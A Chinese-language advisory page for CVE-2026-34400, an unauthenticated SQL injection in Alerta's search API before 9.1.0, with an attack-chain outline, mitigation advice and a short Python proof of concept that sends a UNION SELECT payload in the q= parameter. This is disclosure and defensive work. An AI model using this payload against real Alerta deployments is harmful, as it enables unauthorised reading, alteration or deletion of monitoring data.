CVE-2026-34400 CVSS 9.8 严重

CVE-2026-34400 Alerta SQL注入漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34400

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Alerta

漏洞概述

Alerta是一款开源的监控工具。在9.1.0版本之前，其查询字符串搜索API存在严重的SQL注入漏洞。该漏洞是由于Postgres查询解析器在构建SQL WHERE子句时，使用了不安全的f-strings方式直接拼接用户提供的搜索参数导致的。攻击者无需认证即可利用该漏洞，通过构造恶意的查询参数执行任意SQL命令，从而可能导致敏感数据泄露、数据篡改或服务完全不可用。

技术细节

该漏洞的核心在于Alerta后端处理搜索请求时的不安全编码实践。当用户通过API接口提交查询参数（如q=）时，应用程序会调用Postgres查询解析器将输入转换为SQL语句。由于开发人员使用了Python的f-strings直接将用户输入嵌入到SQL字符串中，而不是使用参数化查询或ORM提供的安全方法，导致输入未经过滤就直接进入数据库执行。攻击者可以通过网络向受影响端点发送包含特定SQL元字符（如单引号、注释符、UNION SELECT等）的恶意请求。由于该接口无需身份验证（PR:N）且无需用户交互（UI:N），攻击者可轻易利用此漏洞绕过应用逻辑，直接读取、修改或删除数据库中的任何数据，甚至可能通过特定的数据库函数执行系统命令，造成严重的机密性、完整性和可用性影响。

攻击链分析

STEP 1

侦察

攻击者识别出目标网络中运行的是Alerta监控工具，且版本低于9.1.0。

STEP 2

武器化

攻击者构造特定的SQL注入Payload，利用f-strings拼接的特性，旨在通过API查询参数（q=）注入恶意SQL代码。

STEP 3

交付

攻击者通过互联网向Alerta服务器的Query string search API发送包含恶意Payload的HTTP GET请求。

STEP 4

利用

后端Postgres解析器直接执行了拼接后的SQL语句，攻击者成功绕过应用层逻辑，直接操作数据库。

STEP 5

影响

攻击者获取了数据库的敏感信息（C:H），篡改或删除了关键数据（I:H），甚至导致服务崩溃（A:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual vulnerable instance)
target_url = "http://127.0.0.1:8080/api/alerts"

# Malicious payload to demonstrate SQL injection via the 'q' parameter
# This payload attempts to perform a Boolean-based blind SQL injection
# or a UNION-based injection to extract database version.
payload = "test' UNION SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- -"

params = {
    "q": payload
}

try:
    # Send GET request to the vulnerable endpoint
    response = requests.get(target_url, params=params, timeout=10)

    # Check if the request was successful
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response Content:")
        print(response.text)
        
        # Analyze response to confirm vulnerability (e.g., looking for Postgres version string)
        if "PostgreSQL" in response.text or "postgres" in response.text.lower():
            print("[!] Potential SQL Injection confirmed: Database version leaked in response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

影响范围

Alerta < 9.1.0

防御指南

临时缓解措施

如果无法立即升级，建议将Alerta API接口限制在内网访问，或通过反向代理实施严格的IP白名单策略，阻止外部未授权访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表